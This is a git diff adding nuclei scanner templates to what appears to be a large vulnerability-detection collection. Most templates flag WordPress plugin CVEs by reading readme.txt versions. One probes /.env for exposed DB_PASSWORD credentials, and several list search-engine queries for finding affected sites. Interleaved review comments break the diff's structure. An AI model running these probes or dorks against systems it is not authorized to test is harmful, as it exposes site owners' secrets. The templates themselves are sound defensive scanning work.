diff --git a/date.txt b/date.txt
index 18b2d489ab..cf7fc14e4e 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20241021
+20241022
diff --git a/poc.txt b/poc.txt
index e6675774e4..81cd5a5683 100644
--- a/poc.txt
+++ b/poc.txt
@@ -3469,6 +3469,7 @@
 ./poc/auth/idemia-biometrics-default-login-8140.yaml
 ./poc/auth/idemia-biometrics-default-login-8141.yaml
 ./poc/auth/idemia-biometrics-default-login.yaml
+./poc/auth/identification-auth-failures.yaml
 ./poc/auth/ikuai-login-panel.yaml
 ./poc/auth/imgproxy-unauth.yaml
 ./poc/auth/imm-default-login.yaml
@@ -7857,6 +7858,7 @@
 ./poc/config/samba-config.yaml
 ./poc/config/sangfor-sysuser-conf.yaml
 ./poc/config/scrutinizer-config.yaml
+./poc/config/security-misconfiguration.yaml
 ./poc/config/seeyon-a6-config-disclosure.yaml
 ./poc/config/server-config-exposure.yaml
 ./poc/config/servicenow-widget-misconfig.yaml
@@ -33534,6 +33536,8 @@
 ./poc/cve/CVE-2024-0984-71d91175d296ca328f8e62ec29060567.yaml
 ./poc/cve/CVE-2024-0984.yaml
 ./poc/cve/CVE-2024-0986.yaml
+./poc/cve/CVE-2024-10002-71345796cb4129b3fb6d852524945f8d.yaml
+./poc/cve/CVE-2024-10003-80927643a11133e8ee1977195d97aaa0.yaml
 ./poc/cve/CVE-2024-10014-287fb7ccc9db018318f62de1bc8e246a.yaml
 ./poc/cve/CVE-2024-10014.yaml
 ./poc/cve/CVE-2024-10040-ee8183e3617c63ac904e5e710044f265.yaml
@@ -33550,6 +33554,7 @@
 ./poc/cve/CVE-2024-10079.yaml
 ./poc/cve/CVE-2024-10080-e752dddf0fc4544c6494ed49850e78fe.yaml
 ./poc/cve/CVE-2024-10080.yaml
+./poc/cve/CVE-2024-10189-c70ac469531f5752b3a747a22314dda8.yaml
 ./poc/cve/CVE-2024-1021.yaml
 ./poc/cve/CVE-2024-1037-b7f7f3d961a0c33ea429c4b0e05a6902.yaml
 ./poc/cve/CVE-2024-1037.yaml
@@ -42134,6 +42139,7 @@
 ./poc/cve/CVE-2024-49232.yaml
 ./poc/cve/CVE-2024-49233-261ba1e19db5d8ea0ca73754d2643b65.yaml
 ./poc/cve/CVE-2024-49233.yaml
+./poc/cve/CVE-2024-49234-287d2d4dd3874686e9c59c7e063b8dd3.yaml
 ./poc/cve/CVE-2024-49234-2a3ec3b8e61e55817a7572435c2420a7.yaml
 ./poc/cve/CVE-2024-49234.yaml
 ./poc/cve/CVE-2024-49235-398d09065c9d52a66ebe7e2938bdcb0f.yaml
@@ -42192,9 +42198,11 @@
 ./poc/cve/CVE-2024-49261.yaml
 ./poc/cve/CVE-2024-49262-58c69b03aeac6a6c2f651a6fea576e10.yaml
 ./poc/cve/CVE-2024-49262.yaml
+./poc/cve/CVE-2024-49263-7552f0828dc77994e8b6111bcc07c62e.yaml
 ./poc/cve/CVE-2024-49263-8116ee4a4f994fa893383c133a8a6d59.yaml
 ./poc/cve/CVE-2024-49263.yaml
 ./poc/cve/CVE-2024-49264-6976ce8ecee9f1b1023d1b5f178241f2.yaml
+./poc/cve/CVE-2024-49264-bce9a4493c3e0acb08816861aa7e69a0.yaml
 ./poc/cve/CVE-2024-49264.yaml
 ./poc/cve/CVE-2024-49265-876650119d03582057b884e74652dcf7.yaml
 ./poc/cve/CVE-2024-49265.yaml
@@ -42270,6 +42278,7 @@
 ./poc/cve/CVE-2024-49304.yaml
 ./poc/cve/CVE-2024-49305-ec750a30a095a0ecaf36eb7e4f2b32f3.yaml
 ./poc/cve/CVE-2024-49305.yaml
+./poc/cve/CVE-2024-49306-0bb0318ccc4bea732c4bdca26fccb3c9.yaml
 ./poc/cve/CVE-2024-49306-1cdf03661e0a2c823137f9050fb9576e.yaml
 ./poc/cve/CVE-2024-49306.yaml
 ./poc/cve/CVE-2024-49307-da66eb5866b3f5651906f6c0badd8c14.yaml
@@ -42279,6 +42288,7 @@
 ./poc/cve/CVE-2024-49309-2743490b9daf5d0d5caf695b0ef2e8a9.yaml
 ./poc/cve/CVE-2024-49309.yaml
 ./poc/cve/CVE-2024-49310-399f2ba734a2c77b22872cdde47bca7e.yaml
+./poc/cve/CVE-2024-49310-c0e73cd772d251a739b2435edee2bd31.yaml
 ./poc/cve/CVE-2024-49310.yaml
 ./poc/cve/CVE-2024-49311-38f42991b2728e11dfb591840cf7f7b8.yaml
 ./poc/cve/CVE-2024-49311.yaml
@@ -44192,8 +44202,10 @@
 ./poc/cve/CVE-2024-8513.yaml
 ./poc/cve/CVE-2024-8514-d1287e8f3b1069f2713d7c995f6bc945.yaml
 ./poc/cve/CVE-2024-8514.yaml
+./poc/cve/CVE-2024-8515-4fab457421fd53fdaacbeb1402844959.yaml
 ./poc/cve/CVE-2024-8515-c4009c842ec692ba826e1dd27a89a08d.yaml
 ./poc/cve/CVE-2024-8515.yaml
+./poc/cve/CVE-2024-8516-8fbfc934c79036dfbd5a416f6fefcf7e.yaml
 ./poc/cve/CVE-2024-8516-b0ae53f5d8bc37643f2a8b5730bca703.yaml
 ./poc/cve/CVE-2024-8516.yaml
 ./poc/cve/CVE-2024-8519-c09aac3ec9eb3ec8e899518d68fbb383.yaml
@@ -44379,6 +44391,7 @@
 ./poc/cve/CVE-2024-8850-0902b81489aa227f3c7bf015ba1bc328.yaml
 ./poc/cve/CVE-2024-8850-c5767b8067af0d0ab764024c9d8b2952.yaml
 ./poc/cve/CVE-2024-8850.yaml
+./poc/cve/CVE-2024-8852-5434e9f4c6616aa0da6a6e79ca2414d1.yaml
 ./poc/cve/CVE-2024-8853-4af00fcf0e5fb8017cf4fcd8671e540c.yaml
 ./poc/cve/CVE-2024-8853.yaml
 ./poc/cve/CVE-2024-8858-85931089ed9ebbb07f095bbb884fe4d0.yaml
@@ -44568,6 +44581,7 @@
 ./poc/cve/CVE-2024-9228-5d6c269fdf1aad171438d76ce7eba27a.yaml
 ./poc/cve/CVE-2024-9228-b8423e6fcac2024db44fa444099a9f5b.yaml
 ./poc/cve/CVE-2024-9228.yaml
+./poc/cve/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml
 ./poc/cve/CVE-2024-9232-ae04b408f1f5990a6794318169fc173c.yaml
 ./poc/cve/CVE-2024-9232.yaml
 ./poc/cve/CVE-2024-9234-a70b6d1b82b579fc4a6ae49321787247.yaml
@@ -44699,6 +44713,7 @@
 ./poc/cve/CVE-2024-9538.yaml
 ./poc/cve/CVE-2024-9540-16b50ef118163619f4eb48f582dee59f.yaml
 ./poc/cve/CVE-2024-9540.yaml
+./poc/cve/CVE-2024-9541-720c3bbef5faf4e37833433865e32bd5.yaml
 ./poc/cve/CVE-2024-9543-2a84b7caa56d7b7baa1f298aba568720.yaml
 ./poc/cve/CVE-2024-9543.yaml
 ./poc/cve/CVE-2024-9546-393c04a252e7afb4c4921ddce751cf73.yaml
@@ -44717,6 +44732,10 @@
 ./poc/cve/CVE-2024-9587-9addb86845d8c338383a9caf97ac21e2.yaml
 ./poc/cve/CVE-2024-9587-cd342c17bf770ce7412f8a55478ea774.yaml
 ./poc/cve/CVE-2024-9587.yaml
+./poc/cve/CVE-2024-9588-85ec1c6254ec8125746585f3ac5317bc.yaml
+./poc/cve/CVE-2024-9589-f895fb648dc6ecd1d8cb0e28c34a5040.yaml
+./poc/cve/CVE-2024-9590-d335833612c12a3934657fc9b0690fce.yaml
+./poc/cve/CVE-2024-9591-26f35871fb392b482473e0ce75b175fb.yaml
 ./poc/cve/CVE-2024-9592-fff4a8a541e39d94b5f0980d29acdfe3.yaml
 ./poc/cve/CVE-2024-9592.yaml
 ./poc/cve/CVE-2024-9593-4b4e0d7ea60712fca2be81e1fce11f9a.yaml
@@ -44730,6 +44749,7 @@
 ./poc/cve/CVE-2024-9611.yaml
 ./poc/cve/CVE-2024-9616-74cbb74314a998222d17f0108bdd1b47.yaml
 ./poc/cve/CVE-2024-9616.yaml
+./poc/cve/CVE-2024-9627-609d2082cbf88b0e9c345dfb753e9c47.yaml
 ./poc/cve/CVE-2024-9634-d865b6fc0ac9d8d7dca8d3f6df89b5a1.yaml
 ./poc/cve/CVE-2024-9634.yaml
 ./poc/cve/CVE-2024-9647-7e123a97b0971ee91cbec517bbcda15d.yaml
@@ -59235,6 +59255,7 @@
 ./poc/injection/injection-guard-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/injection/injection-guard-plugin.yaml
 ./poc/injection/injection-guard.yaml
+./poc/injection/injection.yaml
 ./poc/injection/jinhe-oa-cj6-getattout-sql-injection.yaml
 ./poc/injection/joomla-host-injection.yaml
 ./poc/injection/leaguemanager-sql-injection.yaml
@@ -76495,6 +76516,7 @@
 ./poc/other/Securestack-check.yaml
 ./poc/other/SecurestackWorkflow.yaml
 ./poc/other/Seeyou-ReportServer.yaml
+./poc/other/Server-Side-Request-Forgery.yaml
 ./poc/other/SharpTV.yaml
 ./poc/other/SiteCore.yaml
 ./poc/other/Socks4.yaml
@@ -76592,6 +76614,7 @@
 ./poc/other/TVE-2024-105272055.yaml
 ./poc/other/TVE-2024-105272125.yaml
 ./poc/other/TVE-2024-105272130.yaml
+./poc/other/TVE-2024-105272140.yaml
 ./poc/other/TVE-2024-105281100.yaml
 ./poc/other/TVE-2024-105291413.yaml
 ./poc/other/TVE-2024-105291421.yaml
@@ -76653,6 +76676,7 @@
 ./poc/other/X-Remote-IP.yaml
 ./poc/other/X-Rewrite-URL.yaml
 ./poc/other/X11Probe.yaml
+./poc/other/XVE-2024-2116.yaml
 ./poc/other/Yes-059f1c0288ee3dfe1136ff4836457838.yaml
 ./poc/other/Yes-06932c1cf219422c203a87afb2aadded.yaml
 ./poc/other/Yes-164a8e3ab16c6e174a4b2681f22484c6.yaml
@@ -78407,6 +78431,7 @@
 ./poc/other/anand.yaml
 ./poc/other/anbo-fileRead.yaml
 ./poc/other/anchiva-下一代防火墙.yaml
+./poc/other/anchor-episodes-index-58af0f18a5fcf1eb346c47b2a07233bf.yaml
 ./poc/other/anchor-episodes-index-80033c17bf2f62f1615040da4cb0855c.yaml
 ./poc/other/anchor-episodes-index-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/other/anchor-episodes-index-plugin.yaml
@@ -80797,6 +80822,7 @@
 ./poc/other/broadscope-theme.yaml
 ./poc/other/broadscope.yaml
 ./poc/other/brocade-network-advisor.yaml
+./poc/other/broken-access-control.yaml
 ./poc/other/broken-cryptography.yaml
 ./poc/other/broken-link-checker-15c779eefd59e483a066caaa11cc6e81.yaml
 ./poc/other/broken-link-checker-270ab183c749d4d134ad66952b1d5225.yaml
@@ -83974,6 +84000,7 @@
 ./poc/other/cryptocurrency-widgets-pack-df87c30565c27eb58e0271f0dfd6d08b.yaml
 ./poc/other/cryptocurrency-widgets-pack.yaml
 ./poc/other/cryptocurrency.yaml
+./poc/other/cryptographic-failures.yaml
 ./poc/other/cryptxxx-dropper-malware.yaml
 ./poc/other/cryptxxx-malware.yaml
 ./poc/other/crywolf.yaml
@@ -91530,6 +91557,7 @@
 ./poc/other/insecure-content-warning-6c90b20a33edd819f7562bd7a9738958.yaml
 ./poc/other/insecure-content-warning.yaml
 ./poc/other/insecure-data-storage.yaml
+./poc/other/insecure-design.yaml
 ./poc/other/insecure-intent.yaml
 ./poc/other/insecure-pendingintent.yaml
 ./poc/other/insecure-provider-path.yaml
@@ -93603,6 +93631,7 @@
 ./poc/other/loggedin-5904437c0e4687f5fad38a49657b6f13.yaml
 ./poc/other/loggedin.yaml
 ./poc/other/logging-enable.yaml
+./poc/other/logging-monitoring-failures.yaml
 ./poc/other/logj4.yaml
 ./poc/other/logo-carousel-free-6a5c9b8f0001f00851bed5722f30e79a.yaml
 ./poc/other/logo-carousel-free-a965a63b9efc23785a762c4b8acba9c0.yaml
@@ -96079,6 +96108,7 @@
 ./poc/other/news-element.yaml
 ./poc/other/news-flash-d3c78ded753c2d5697cb56f6684f68ca.yaml
 ./poc/other/news-flash.yaml
+./poc/other/news-kit-elementor-addons-ba632fe2b740c260e31470629e4bce9b.yaml
 ./poc/other/news-wall.yaml
 ./poc/other/news.yaml
 ./poc/other/newsletter-076137f3175de41fb442730014b1bb5f.yaml
@@ -100906,6 +100936,8 @@
 ./poc/other/rough-chart.yaml
 ./poc/other/route-bypass.yaml
 ./poc/other/routes-ini.yaml
+./poc/other/rover-idx-1f34dcc286ffc93fb3e1b0d211037251.yaml
+./poc/other/rover-idx-62be7d19aacd1dc53511b643f4c494f8.yaml
 ./poc/other/row-seats-705b40740e42fe5417821b3880e5fc2b.yaml
 ./poc/other/row-seats-a95b8b6b9561d81849e245e8d18ae448.yaml
 ./poc/other/row-seats-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -103261,6 +103293,7 @@
 ./poc/other/softether-vpn.yaml
 ./poc/other/softnext-spam-sqr反垃圾邮件系统.yaml
 ./poc/other/softnext-spam.yaml
+./poc/other/software-integrity-failures.yaml
 ./poc/other/software-license-manager-02438a90e5cab2e347474ab67e16a2e0.yaml
 ./poc/other/software-license-manager-08f24ceaa9760ed4a8e1dcab46bbae35.yaml
 ./poc/other/software-license-manager-307b2ee4cef742e8f25d8c099f335e8b.yaml
@@ -118589,6 +118622,7 @@
 ./poc/sql/CVE-2024-9222-6d3211dbe3c26f975c3e1ae606af3b47.yaml
 ./poc/sql/CVE-2024-9225-8aa496476e08c8c664db47cbf34e8cf4.yaml
 ./poc/sql/CVE-2024-9228-b8423e6fcac2024db44fa444099a9f5b.yaml
+./poc/sql/CVE-2024-9231-db808094493fa9c79c27a8695747553b.yaml
 ./poc/sql/CVE-2024-9382-4e97289b6d15924ff13ebdb1ff9d487d.yaml
 ./poc/sql/CVE-2024-9521-4587dbff6356b28863ebeee1f7d9133f.yaml
 ./poc/sql/CVE-2024-9529-db7341b5bf720c2f45daca0a630903ae.yaml
@@ -120674,6 +120708,7 @@
 ./poc/sql/gratisfaction-all-in-one-loyalty-contests-referral-program-for-woocommerce-02c9318c107dbdb36f47600a527c3e5c.yaml
 ./poc/sql/gravitate-qa-tracker-215d8b5197b6f7aeb2d3dbfbc8015b87.yaml
 ./poc/sql/gravityforms-1a904b571e110f0e4b9a34c3db5f68eb.yaml
+./poc/sql/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml
 ./poc/sql/greenshift-animation-and-page-builder-blocks-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/sql/greenshift-animation-and-page-builder-blocks-e423087db1912dc71ed9a7fb3c664f80.yaml
 ./poc/sql/greenshift-animation-and-page-builder-blocks-f1f4db80fbee368982a32426ca676172.yaml
@@ -123293,6 +123328,7 @@
 ./poc/sql/wp-csv-to-database.yaml
 ./poc/sql/wp-custom-admin-interface-e7f4cac9b7138ea771801902dbf93547.yaml
 ./poc/sql/wp-custom-pages-4ecb0c3a43b68922bceefe42edb28dab.yaml
+./poc/sql/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml
 ./poc/sql/wp-custom-widget-area-1ea5db37756be1000588b9e7abbeedc9.yaml
 ./poc/sql/wp-dashboard-notes-2b4a88dbb7351e7d5e5abf5d4411034a.yaml
 ./poc/sql/wp-data-access-6477bf18cad6c823db485408d49b337b.yaml
@@ -127841,6 +127877,7 @@
 ./poc/wordpress/all-in-one-wp-migration-box-extension-1bca30bfa530491005d273161772bbf9.yaml
 ./poc/wordpress/all-in-one-wp-migration-box-extension.yaml
 ./poc/wordpress/all-in-one-wp-migration-c457cee6c5aa713c1063985f51820d05.yaml
+./poc/wordpress/all-in-one-wp-migration-d0602d88b7a2ebc8e02fc980ec9ff551.yaml
 ./poc/wordpress/all-in-one-wp-migration-d117a201289397334dc6793f85e0dcec.yaml
 ./poc/wordpress/all-in-one-wp-migration-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/wordpress/all-in-one-wp-migration-dbb57e02ddae00246143735ae023fd47.yaml
@@ -128469,6 +128506,7 @@
 ./poc/wordpress/gotowp.yaml
 ./poc/wordpress/graphql-apiforwp-detect.yaml
 ./poc/wordpress/graphql-wpgraphql-detect.yaml
+./poc/wordpress/green-wp-telegram-bot-by-teplitsa-f4d91a36f69a0a6db9e8b66dd5fbf50c.yaml
 ./poc/wordpress/gsheetconnector-wpforms-d2948c1dd9d5eb0f8df60f0e61ec629c.yaml
 ./poc/wordpress/gsheetconnector-wpforms-pro-d2948c1dd9d5eb0f8df60f0e61ec629c.yaml
 ./poc/wordpress/gsheetconnector-wpforms-pro.yaml
@@ -131140,6 +131178,10 @@
 ./poc/wordpress/wp-custom-tables-xss-11434.yaml
 ./poc/wordpress/wp-custom-tables-xss-11435.yaml
 ./poc/wordpress/wp-custom-tables-xss.yaml
+./poc/wordpress/wp-custom-taxonomy-image-ff69d9fcb5013b24ed5e9f0e28f264ca.yaml
+./poc/wordpress/wp-custom-taxonomy-meta-03d615dbe0d467782bc97145da21db4c.yaml
+./poc/wordpress/wp-custom-taxonomy-meta-1a57f82f58a521a35beef6631da85769.yaml
+./poc/wordpress/wp-custom-taxonomy-meta-71b559f4718ead12ce8f1c918463d75d.yaml
 ./poc/wordpress/wp-custom-widget-area-1ea5db37756be1000588b9e7abbeedc9.yaml
 ./poc/wordpress/wp-custom-widget-area.yaml
 ./poc/wordpress/wp-customer-reviews-352d038c1686829388214d7302c76842.yaml
@@ -131847,6 +131889,7 @@
 ./poc/wordpress/wp-food-manager.yaml
 ./poc/wordpress/wp-football-ab1c9b8c8ad02edb393b9c947c7bcf69.yaml
 ./poc/wordpress/wp-football.yaml
+./poc/wordpress/wp-footnote-xss.yaml
 ./poc/wordpress/wp-footnotes-b40c4ab6051d7b912eccdd919bfd8f70.yaml
 ./poc/wordpress/wp-footnotes.yaml
 ./poc/wordpress/wp-force-ssl-535af98dd21b180aed9353b26ab61bf4.yaml
@@ -132694,6 +132737,7 @@
 ./poc/wordpress/wp-members-88e4e1b584b84b271d582900c5f4302a.yaml
 ./poc/wordpress/wp-members-8db9f530e08181a4bd6b357664b8db50.yaml
 ./poc/wordpress/wp-members-d41d8cd98f00b204e9800998ecf8427e.yaml
+./poc/wordpress/wp-members-d9bd5a558214a2feec4d73014329df0f.yaml
 ./poc/wordpress/wp-members-e432ea791c693777e599927023287a95.yaml
 ./poc/wordpress/wp-members-e93bf812b439d7519b22bf169d48b8da.yaml
 ./poc/wordpress/wp-members-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -135779,6 +135823,7 @@
 ./poc/xss/akamai-arl-xss-249.yaml
 ./poc/xss/akamai-arl-xss.yaml
 ./poc/xss/analytify-plugin-xss.yaml
+./poc/xss/application-pass-xss.yaml
 ./poc/xss/avada-xss.yaml
 ./poc/xss/avaya-aura-xss.yaml
 ./poc/xss/avchat-video-chat-xss.yaml
@@ -136184,6 +136229,7 @@
 ./poc/xss/wp-flagem-xss-11453.yaml
 ./poc/xss/wp-flagem-xss-11454.yaml
 ./poc/xss/wp-flagem-xss.yaml
+./poc/xss/wp-footnote-xss.yaml
 ./poc/xss/wp-gutenberg-xss.yaml
 ./poc/xss/wp-insert-php-xss.yaml
 ./poc/xss/wp-knews-xss-11483.yaml
diff --git a/poc/auth/identification-auth-failures.yaml b/poc/auth/identification-auth-failures.yaml
new file mode 100644
index 0000000000..b0377a823a
--- /dev/null
+++ b/poc/auth/identification-auth-failures.yaml
@@ -0,0 +1,20 @@
+id: identification-auth-failures
+info:
+  name: Identification and Authentication Failures
+  author: Ali Baykara
+  severity: critical
+  description: |
+    Checks for vulnerabilities in login mechanisms and potential authentication bypasses.
+  tags: owasp, auth-failure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/login"
+    matchers:
+      - type: word
+        words:
+          - "admin"
+      - type: status
+        status:
+          - 200
diff --git a/poc/config/security-misconfiguration.yaml b/poc/config/security-misconfiguration.yaml
new file mode 100644
index 0000000000..632c21b235
--- /dev/null
+++ b/poc/config/security-misconfiguration.yaml
@@ -0,0 +1,17 @@
+id: security-misconfiguration
+info:
+  name: Security Misconfiguration
+  author: Ali Baykara
+  severity: high
+  description: |
+    Detects common security misconfigurations such as exposed .env files that contain sensitive information.
+  tags: owasp, misconfiguration
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.env"
+    matchers:
+      - type: word
+        words:
+          - "DB_PASSWORD"
diff --git a/poc/cve/CVE-2024-10002-71345796cb4129b3fb6d852524945f8d.yaml b/poc/cve/CVE-2024-10002-71345796cb4129b3fb6d852524945f8d.yaml
new file mode 100644
index 0000000000..9d544dcf97
--- /dev/null
+++ b/poc/cve/CVE-2024-10002-71345796cb4129b3fb6d852524945f8d.yaml
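Review bot: The two matchers on `/login` have no `matchers-condition`, and nuclei's default is OR, so any target that answers `/login` with a 200 — or any page whose body contains the substring `admin` — is reported as `critical`, even though neither condition demonstrates an authentication failure. I would set `severity: info`, add `matchers-condition: and` under the request, and make the description honest about what is tested: `description: Flags a reachable /login page whose body mentions "admin"; it does not attempt any bypass.` `requests:` is the legacy top-level key; the other templates in this commit use `http:`.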
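Review bot: The lone word matcher on `DB_PASSWORD` has no status constraint and no `part`, so any HTML page that mentions that token — a framework docs page, a soft-404, a WAF block page echoing the request — matches as a `high` `.env` exposure. I would pin it to an actual dotenv body: `matchers-condition: and`, a `status: 200` matcher, and a regex matcher `(?m)^\s*DB_PASSWORD\s*=` in place of the bare word; a negative match on a `text/html` content type would cut most of the remainder. Since the template only probes `{{BaseURL}}/.env`, the description should also say it covers the web root only. `requests:` is the legacy key; the rest of the commit uses `http:`.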
@@ -0,0 +1,59 @@
+id: CVE-2024-10002-71345796cb4129b3fb6d852524945f8d
+
+info:
+  name: >
+    Rover IDX <= 3.0.0.2905 - Authenticated (Subscriber+) Authentication Bypass to Administrator
+  author: topscoder
+  severity: low
+  description: >
+    The Rover IDX plugin for WordPress is vulnerable to Authentication Bypass in versions up to, and including, 3.0.0.2905. This is due to insufficient validation and capability check on the 'rover_idx_refresh_social_callback' function. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to log in to administrator. The vulnerability is partially patched in version 3.0.0.2905 and fully patched in version 3.0.0.2906.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5cf6a9fb-3c3b-48ad-a39b-77a529b89901?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2024-10002
+  metadata:
+    fofa-query: "wp-content/plugins/rover-idx/"
+    google-query: inurl:"/wp-content/plugins/rover-idx/"
+    shodan-query: 'vuln:CVE-2024-10002'
+  tags: cve,wordpress,wp-plugin,rover-idx,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/rover-idx/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "rover-idx"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.0.0.2905')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10003-80927643a11133e8ee1977195d97aaa0.yaml b/poc/cve/CVE-2024-10003-80927643a11133e8ee1977195d97aaa0.yaml
new file mode 100644
index 0000000000..2ac0f773ff
--- /dev/null
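Review bot: `severity: low` and the trailing `low` tag disagree with the template's own `classification` block, which records CVSS 8.8 (C:H/I:H/A:H) for a subscriber-to-administrator authentication bypass; anything that sorts findings by `severity` will bury this one under stored-XSS fingerprints. I would change the two lines to `severity: high` and `tags: cve,wordpress,wp-plugin,rover-idx,high`. The dsl matcher also counts 3.0.0.2905 as vulnerable while the description calls that version partially patched; that is defensible, but it deserves a comment on the dsl line so nobody "fixes" it, e.g. `# 3.0.0.2905 is only partially patched per the Wordfence advisory; 3.0.0.2906 is the full fix`.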
+++ b/poc/cve/CVE-2024-10003-80927643a11133e8ee1977195d97aaa0.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10003-80927643a11133e8ee1977195d97aaa0
+
+info:
+  name: >
+    Rover IDX <= 3.0.0.2903 - Authenticated (Subscriber+) Missing Authorization via Multiple Functions
+  author: topscoder
+  severity: low
+  description: >
+    The Rover IDX plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to a missing capability check on multiple functions in all versions up to, and including, 3.0.0.2903. This makes it possible for authenticated attackers, with subscriber-level access and above, to add, modify, or delete plugin options.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/cdf67099-5514-45ba-9a4c-10af984bf593?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
+    cvss-score: 6.3
+    cve-id: CVE-2024-10003
+  metadata:
+    fofa-query: "wp-content/plugins/rover-idx/"
+    google-query: inurl:"/wp-content/plugins/rover-idx/"
+    shodan-query: 'vuln:CVE-2024-10003'
+  tags: cve,wordpress,wp-plugin,rover-idx,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/rover-idx/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "rover-idx"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.0.0.2903')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-10189-c70ac469531f5752b3a747a22314dda8.yaml b/poc/cve/CVE-2024-10189-c70ac469531f5752b3a747a22314dda8.yaml
new file mode 100644
index 0000000000..837418d01d
--- /dev/null
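Review bot: Nothing in `description` says that this template only reads the `Stable tag` from the plugin's public `readme.txt` and never calls the functions that lack the capability check, so a hit is a version fingerprint rather than a confirmed missing-authorization finding, and a site patched without a readme bump (or carrying a stale readme) is misreported either way. I would append to the description: `Detection is version-based (readme.txt Stable tag); it does not exercise the affected functions and may report installs that are patched but unchanged in readme.txt.` Separately, `severity: low` sits below the 6.3 CVSS the `classification` block records, which maps to medium.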
+++ b/poc/cve/CVE-2024-10189-c70ac469531f5752b3a747a22314dda8.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-10189-c70ac469531f5752b3a747a22314dda8
+
+info:
+  name: >
+    Anchor Episodes Index (Spotify for Podcasters) <= 2.1.10 - Authenticated (Contributor+) Stored Cross-Site Scripting via anchor_episodes Shortcode
+  author: topscoder
+  severity: low
+  description: >
+    The Anchor Episodes Index (Spotify for Podcasters) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's anchor_episodes shortcode in all versions up to, and including, 2.1.10 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+  reference:
+    - https://github.com/topscoder/nuclei-wordfence-cve
+    - https://www.wordfence.com/threat-intel/vulnerabilities/id/8c8e37f8-708e-41d5-a6b8-3ba587437532?source=api-prod
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 6.4
+    cve-id: CVE-2024-10189
+  metadata:
+    fofa-query: "wp-content/plugins/anchor-episodes-index/"
+    google-query: inurl:"/wp-content/plugins/anchor-episodes-index/"
+    shodan-query: 'vuln:CVE-2024-10189'
+  tags: cve,wordpress,wp-plugin,anchor-episodes-index,low
+
+http:
+  - method: GET
+    redirects: true
+    max-redirects: 3
+    path:
+      - "{{BaseURL}}/wp-content/plugins/anchor-episodes-index/readme.txt"
+
+    extractors:
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        internal: true
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        name: version
+        part: body
+        group: 1
+        regex:
+          - "(?mi)Stable tag: ([0-9.]+)"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        words:
+          - "anchor-episodes-index"
+        part: body
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 2.1.10')
\ No newline at end of file
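Review bot: The two regex extractors under `extractors:` are the same pattern, both named `version`, differing only in `internal: true`; the second one appears to exist only so the version is printed in the result while the internal copy feeds `compare_versions`, and that leaves two places to keep in sync whenever the pattern changes. Whether a single non-internal extractor would serve both purposes depends on the nuclei release this repo targets, which I cannot tell from the hunk, so at minimum the duplicate should say why it is there, e.g. `# duplicate of the internal extractor: surfaces the version in output; keep the two patterns identical`. Note also that `Stable tag: trunk`, which wordpress.org allows, matches neither copy and leaves `version` unset.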
diff --git a/poc/cve/CVE-2024-49234-287d2d4dd3874686e9c59c7e063b8dd3.yaml b/poc/cve/CVE-2024-49234-287d2d4dd3874686e9c59c7e063b8dd3.yaml
new file mode 100644
index 0000000000..6c48d28cf5
--- /dev/null
+++ b/poc/cve/CVE-2024-49234-287d2d4dd3874686e9c59c7e063b8dd3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-49234-287d2d4dd3874686e9c59c7e063b8dd3
+
+info:
+  name: >
